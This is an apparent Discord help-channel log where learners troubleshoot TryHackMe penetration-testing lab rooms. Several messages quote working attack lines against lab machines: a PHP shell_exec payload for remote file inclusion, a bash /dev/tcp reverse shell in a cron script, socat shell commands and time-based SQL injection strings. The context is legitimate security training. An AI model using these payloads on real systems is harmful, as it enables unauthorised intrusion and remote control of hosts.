hi in need of some help, going through the burp suite basics and im at the bit about the scope and site map issues, my burpsuite does not have a tab for scope, just site map and issue definitions and also the target machine site wont load i get a burp suite error on my browser saying it cant connect

stuck on that, what would be the solution ?

topic : file inclusion

Could someone help with the last question on this lab? https://tryhackme.com/room/fileinc

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

I have the simple http server running in the right folder with host.txt containing this:
<?php echo shell_exec('hostname');?>

and everytime I input this to my browser (10.10.53.13/playground.php?file=http://%28mytun0%29:8000/host.txt), I just get a blank output after File Content Preview. When trying this with random unreachable IPs it gives an error, so it is reaching the file just not giving any output for some reason. Feel like it could be a broken box, but also feel like I could be noobing pretty hard somewhere. Would appreciate any assistance

enter an invalid input and you'll see function.include is referenced in the error. answer is ||includes||

Please add a || before and after the answer so as not to spoil it for other users.

There have been updates to Burp since the room was created, thus the UI change. On the target machine site, have you setup FoxyProxy?

hello can u explain to me when should we use spoofing and decoys in which cases i mean (third room in the Nmap series)

i think when you want to make a stealthier attack to avoid the target knowing exactly who scanned their network

Yeah I’ve set up foxyproxy on my own machine and also tried using the attack box with it all set up but still no scope on there either, thought it might be an update has scope been removed or where can I find it now?

screenshot?

I dont use the attack box and on my kali vm this wordlist wasn't present; I got it from github, but I think sth changed in the meantime and the first and second result from the question were my second and third...

hi guys i got a problem i started a lab yesterday and i use the thm attackbox but i got 504 can anyone know the problem, i use the good ip the good url but nothing good (in the "walking an application" in "jr pentester"

screenshot would help

Hi Guys, there's something that seems strange with Task 4 - Traceroute in Active Reconnaissance. I think the answer may be wrong or I'm just misunderstanding something here. The question is asking the following "In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com?" and the answer the site excepts is the following 172.67.69.208 but in the example the last hop before should be on line 13 100.92.9.83 since on the top of the attached image tryhackme.com resolves to 172.67.69.208.

Thanks, it's just something i was racking my brain and I'm like why would someone do this but I'm sure there is a reason as i'm very earlier in using tryhackme

Gave +1 Rep to @sturdy harness

Yeah i wondered the same tbh

https://gyazo.com/f0c8706724c52515d6c491c6b735fc2f

Can you verify your account please? Folks might not be willing to click kn random links.

!docs verify

Hi I have just joined but have been on THM a few times. I am stuck in Content Discovery, as the AttackBox firefox isnt working - any advice? thanks

Free users don't get access to an external network.

user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP - does the machine ip mean the actual url or do i need to do nslookup to get the numerical version? This is in the subdomain enumeration/virtual hosts

When you start the

Machine for the task

And wait for one minute

The machine ip will change to the ip of the machine

Thanks so much ❤️

Gave +1 Rep to @velvet bane

Youre welcome

Connect on your own machine using open vpn

Did you find out

No nothing yet. I think it’s accepting the wrong answers as correct. Because the IP it accepts is not the last IP before getting to the destination like the question is asking for.

Hmm I c

Hi. Having a hardtime getting the flag in Web Hacking > File Inclusion > Task 8 Challenge > Capture Flag2 at /etc/flag2. It's already in admin, can't seem to get the correct relative path? can you help with another hint? Thank you!

You need to change the cookie to something else than just admin

Hi all, this is a simple question. I'm not able to copy things from the Tryhackme website into the AttackBox. Has anyone a solution?

Open it in full screen, or press the little grey/white arrow on the left hand side of the attackbox

Thank you!

is it okay to refer to the writeup for tasks?

after u try solving it on ur own ofc

i plan on redoing these tasks again at some point of time but just wondering

coz well im almost done with the junior pentest path

but i mean its more so taught me about all that can be done

and i do know about some stuff

but im not exactly confident persay

and i dont exactly have all the stuff in my mind with details

just have doors for stuff and then i have to refer to my notes or the internet

so im wondering if this is normal or what

and how can i well get better and more versed?

if your learning i feel its ok. Especially if you are going back and re trying it. I starting doing thm like a month or so ago or so everyday. Just reading several walkthroughs and doing the labs daily, I feel so much more confident as I am progressing I am actually understanding some of what I am doing vs blindly copying.

I mean even when i use writeups i still do understand whats going. its just that i cant exactly memorize or keep most of that stuff in mind

I dont think anyone can unless they do it everyday for years and even then most people specialize. Sounds like your ahead if anything.

oh right

ty man

what should i do after jr penteting if i want to become a pentester in the future

The Offensive Pentesting path is a great choice

Im doing IDOR room in junior pentesting can anyone else view the site. It is telling me the domain is expired

its working

i did it yesturday only

i have the same problem

cant see the site

its a known issue at the moment, please keep an eye on #site-support. The issues have been reported to THM 🙏

👍

hi can we help me for task 9 linux privilege escalation capture flag5.txt i am blocked and idk what i have to do.Sorry but i can't screenshot don't ask me why i don't know myself so here exactly what i have do. i have already change right of execution by doing chmod +x on backup.sh.it's the good machine started on the task 9. GNU nano 4.8 backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.105.167/4545 0>&1

on another terminal nc -lvp 4545 but i don't became root and i stay being karen Listening on [0.0.0.0] (family 0, port 4545)
Connection from ip-10-10-144-163.eu-west-1.compute.internal 52690 received!
karen@ip-10-10-144-163:~$

Attackbox or VM?

Attackbox

i use ssh for connect

Did you make the cron executable?

cat etc/crontab?

No, chmod it.

chmod +x backup.sh

ah yes

yes i have already did it

i have findout a new thing if i start the cron on guacamole and look the listener on my attackbox i got this root@ip-10-10-105-167:~# nc -lvp 4545
Listening on [0.0.0.0] (family 0, port 4545)
Connection from ip-10-10-144-163.eu-west-1.compute.internal 52822 received!
karen@ip-10-10-144-163:~$ root@ip-10-10-105-167:~#
exactly word by word i precise.

I'm on https://tryhackme.com/room/burpsuiteintruder
Task 13 Bonus question: Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.
I could need some inspiration on that, I do have only ideas like enumerating the count of columns but that is quiet clear at the beginning because of the response in the browser... I am a bit confused what I could do in any meaningful way...

EDIT: That gave me some ideas: https://tryhackme.com/forum/thread/623c4ffa32f06a005b4b7b33

still scratching my head -_- hmm.. another entry for the cookie? example --> Cookie: THM=admin; ???=???

I stuck a while on that too. It's about to use the cookie in a different way. Try different cookie values and observe what happens in the response, how your cookies are treated. If you need a more obvious hint let me know.

ty

Gave +1 Rep to @midnight maple

Hey guys I'm new to the discord. I'm currently doing junior pentester subdomain enumeration. I don't quite get the idea of virtual host bruteforcing. I understand DNS bruteforcing as those DNS's are public, pretty self explanatory. What is the difference between using DNSrecon and ffuf? I can't seem to wrap my head around how they're doing different things. Is it because with ffuf you're specifying the IP and bruteforcing all the DNS on that IP? If so could you not still use a standard DNS bruteforce?

I maybe dont get all the aspects of your question, but one basic thing i can say is that dnsrecon does many different things and what you do in this task with ffuf is only one aspect of the things dnsrecon does by default. with the provided ffuf command it is really only about subdomain enumeration by a wordlist attack no dns lookups etc. and with this wordlist attack it is not about what is somewhere available, it is about FUZZ.example.com, which values of FUZZ return a valid response is the only question.

and if you have a look at what dnsrecon is doing you see that it does more (which is not necessarily useful in all scenarios): https://www.kali.org/tools/dnsrecon/

Thank you this does help slightly. Would this be accurate: with a DNS bruteforce you are utilising the DNS server to see which subdomains exist, but with a virtual host bruteforce you are requesting it directly from the host IP? And if that returns a response or not? I guess I'm being thrown off by the basic difference between a DNS bruteforce and a virtual host bruteforce

Gave +1 Rep to @unique solar

thats a tricky question for me because i am not so skilled in theoretically talking about this stuff and the differences between two wordlist based methods arent so big. i can only quote from the virtual hosts task which makes it kind of clear to me (but doesnt capture all aspects):

Some subdomains aren't always hosted in publically accessible DNS results, such as development versions of a web application or administration portals.
...
Because web servers can host multiple websites from one server when a website is requested from a client, the server knows which website the client wants from the Host header. We can utilise this host header by making changes to it and monitoring the response to see if we've discovered a new website.

I think I understand. So you would be doing a vhost bruteforce for the purpose of finding subdomains not publically accessible through DNS records

This is a totally separate question, but what is the deciding factor in whether a subdomain is publically accessible via DNS results? Can a developer somehow choose to keep the site live but "private" so it cannot be accessed through normal DNS servers?

Just to know.
i'm actually on task 8 (practical blind XSS) and i made the code with nc and made the ticket i just need to wait or i need to open my ticket?

I'm waiting rn but didnt get anything on nc

And if i open i get the cookie id but is not the staff one that i need to pass the task

as stated in the description their can be problems by setting up a listener on you local machine and you have to use attack box... if you do so a connection should be established (only by waiting max a minute)

I'm already using attack box

and i wait like 5 minutes and nothing

i would say yes, but i would really like to hear an answer to that topic of someone who can explain this in technical terms.. i can only say that you dont have to create an public dns record and you can do that privately e.g. in your /etc/hosts

all correct right?

no! 0.0.0.0 is an alias for localhost... you have to use their the ip of the attackbox... an then set up a listener on port 9001 on attack box

that way? nothing happens too tried to open an new tab using the IP+port and got something but nothing from the acme test site

nvm

forgot '

Hello
1-How long it takes to finish this path and understand it?
2-Would I be able to find a job with this path only?
3-any things to practice hacking by doing on THM?

@tall swallow

1. It depends on how many hours a day you study this path.
2. No
3. You can go to "Learn" > "Search" and then select "CTF". There you can practice all you've learned

Thank you for your answer and your opinion.
1 - I usually study 2 hours per day. (2 rooms)
2- Why not? please help me to understand the requirements to find a job.
3- Thank you.

Gave +1 Rep to @gloomy snow

1. This path takes an average of 64 hours to complete.
2. TryHackMe certificates are for participation. You're not acually assessed under exam conditions.

I got it.
Thank you so much for your good explaination.

To find a job you need to go for other certificates like OSCP, SEC+. But having a cert isn't a guarantee to get a job (I guess nothing is a guarantee)

I found many jobs in Tokyo and they required only the basic knowledge of the penetration testing, so I was just surprised.
Maybe It's just Japan.

Do you have some IT background?

Hi all. Not stuck, but just curious: In the LFI room, it has you on lab #6 attempt to find what folder the PHP code is forcing to include. Obviously in the lab environment, it is listed right in the placeholder text and obvious access denied errors. In real life, where would be good places to look? Tried the network tab in firefox dev. tools but no dice.

Winprivesc room. the command doesn't work and therefore continuing the room is impossible

Have you tried running the commands separately (or one after the other)?

Or use && instead of &?

I worked as web developer for 3 years

I joined my ex company with zero knowledge it IT.
In Japan, they train people from zero to hero. few people only pay to get a job here.

But i want to find the best company, so i decided to study again for better apportunity

You don’t enter that line on its own, but as part of the larger exploit shown above it in the lesson.

Thanks

hi, idk why if i run the extramile task in burpsuite intruder without adding the macros that make the sessione and loginToken changing over the requests i can get the status code of 200

how is it possible?

if i make the request with the repeater i get 403, but if i run pitchfork attack with the username and password wordlist i get statu 200 and 302

I'm struggling with the room 'What is a Shell'. I can't seem to get a normal, non enctypted bind or reverse socat shell on a linux device.

For reverse I'm using the listener
socat TCP-L:<port> -
and payload
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

For bind I'm using the listener
socat TCP-L:<PORT> EXEC:"bash -li"
and payload
socat TCP:<TARGET-IP>:<TARGET-PORT> -

Trafic get sent but no shell conection is made

Did you check if there is a socat binary in the target? I'm also working on the same room, but haven't done the part where you need to actually spawn a shell.

I got it working with the above commands. I think my syntax must have been off

Well I guess that's why. If you have IT background then it is a lot easier

Yup. Thanks! XD

Gave +1 Rep to @gloomy snow

By doing some of the CFT and progress a little bit, I will go for jobs like the following
https://next.rikunabi.com/rnc/docs/cp_s01880.jsp?fr=cp_s00890&rqmt_id=105326971009&list_disp_no=6&leadtc=keyword_ichiran_cst_bakuten_cast_ttl

They don't require any special knowledge.
I feel like finding a job outside Japan is really hard.

I'm stuck in the Metasploit:Exploitation room task 6 when executing the elf file on the victim machine. It brings me segmentation fault

issue solved, had to change the payload on the multi/handler module

im in the vunrabilites room 2 and i dunno how to do this

python3 47887.py

oh

should i do the second one right?

Are you attacking a bookstore for RCE?

yes

Use thr URL :)*

the http:// one?

Yes

still dont work

Can I have a screenshot please?

Remove the unrecognised arguments.

Just have python3 *file.py* URL

oh

yes thank u very much

You got RCE now?

yes

i got the flag

Super!

👍

+rep Scrubz

how do i vouch you

/vouch Scrubz

That's ok.

but to apply rep to someone just reply to someoen and say "thanks" thx" etc.

You can also tag them

+rep @modest arch

Gave +1 Rep to @vague current

oh okay

+rep @remote iris

Gave +1 Rep to @remote iris

what do they even do

It's just points, it's not used for much

oh

okay

i need u again scrubz

i opened a nc lisener and it dont want to connect to the lisener

Finally i was able to finish this after 1 year haha.

Is 10.10.147.142 still active? As it seemed that it cannot be reached thus the error.

Yes

maybe you have to add http:// before the ip...

no

okay, than maybe reboot...

or try to run nmap on it to see if sth is responding...

it is

i mean i just looked the answer on the internet

so yeah

sad

but it had to be done

In Linux Priv Esc is the last machine vulnerable to the PATH exploit? Mine says permission denied

im a little bit confused on how msfvenom works is there a resource that explains it diffrently to tryhackme or any video and such?

In what way did you try to exploit it?

Have you checked the official documentation from Metasploit and from OffSec?

https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html

https://www.offsec.com/metasploit-unleashed/msfvenom/

ill do that thanks

There are other resources you can look at as well.

should i take this path before web fundamentals?

SQL Injection task 8

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like '%u';--

Even when i use this te request time is 0.001

Not the 5sec

is there anything wrong in my command?

nvm founded

got to reload page

No

I just had this problem as well. An old adage of, "turn it off and turn it back on" popped in my head.

why? on the path guidance pinned in general it seems to say to take this first

okay then why did you ask if web fundementals or jr pentest wasfirst

also im nub

because, people have different perspectives and might offer different insight on why someone might want to do one before the other vs a static message that just applies in general situations

then u do you

If you don't know anything about web http,https things...

But not necessarily because web hacking will help you with that anyway

All about your choice

i seem to have no target section here

Which burp room are you doing?

Need to load up my vm and burp

ok

What do you mean by target section?

What are you doing exactly?

Do you mean like that?

there is meant to be a target option

or do i not need that

If you loaded a website up in burp, then right click > send to intruder

You'll get a target field.

ah ok

Anyone here taken ejpt after this path?

Hi People...I am trying to complete this module. However, when I am clicking on http://machine_ip/sitemap.xml it keeps on loading the server not found. I tried changing the name machine_ip with the connected ip_address, but that still gives me same error. What can be done in this case, as it is not allowing me to complete any module. Same thing with the next topic also. Any guessess?

VM or Attackbox?

Tried both, same results..

Are you on the VPN?

I access it earlier.

I tried with OpenVPN in my kali linux - same result, and also AttackBox provided by THM - same results.

This is actually happening from yesterday. I thought this could be because of exceeding 1 hour/day, but the same case after 24 hours.

Can you link the room?

How should I do that? No idea. Please share steps.

Which room are you having an issue with?

https://tryhackme.com/room/contentdiscovery

This is where I am

I tried this in Kali and also outside in the host system. Same results.

Give me one moment please.

Sure, thanks!

You're doing Task 4, right?

Introduction to Web Hacking/content discovery /Manual discovery sitemap.xml

This task though?

Yes

The place where it shows you the link with an ip address, over there, it shows me Machine_IP

I click on the green start machine and that will give me the ip above.

That will populatre this field also.

IP address is already showing at the top, but I am not able to open that link. It does not work for me..I do not see an option here to share an image, otherwise I would

!docs verify

Follow the above steps.

Have send you the images

You're not starting the machine on task one.

Open Task one and press the start machine button

Ohh shit. I got you now. I started the machine from top, where it shows Attackbox option.

This is associated with the task 1...Ohh Man!! I have been pissed off from yesterday.

Thanks a lot..Checking now.

That machine will be used for all 12 tasks

Also, how do I verify this...It seems I am not verified..

I sent the link above.

Do you have embeds enabled?

Yes, I open-up the link, but it asking me to check the bot towards right side. I don't see any bot

@tiny bluff

Nope, nothing as such is found.

@tiny bluff

Can you see it now? I just tagged it

Yes, I got the bot now..I sent the !verify <token>

no response

Are you DM's open?

Yes

No message as verified or any response from bot...any idea?

I've pinged the bot maintener, they may be busy currently.

Okay, cool! Thanks 🙂 I have started working on the THM room now. It is working. Appreciate your help.

can you try and verify again please?

OKay, sure. Trying now

Great! Now it worked.

Good to hear. Thanks 🙂

xssgi room task 8 not working whatsoever

it s just frustrating

attackbox not working

my own vm not working

i don t receive anything on netcat

Why is Task 6 in Windows Priv Esc like 1 kilometer long 💀 💀 💀

SQL Injection task 8, Tried all a-z 0-9 all caracters and any timeout

referrer=admin123' UNION SELECT SLEEP(2),2 where database() like '%';--

some characters represent other things or special operations for sql... try with leters and numbers only

Is there anything wrong in this code above? I already tried like A-Z a-z 0-9

Just nothing

hmmmm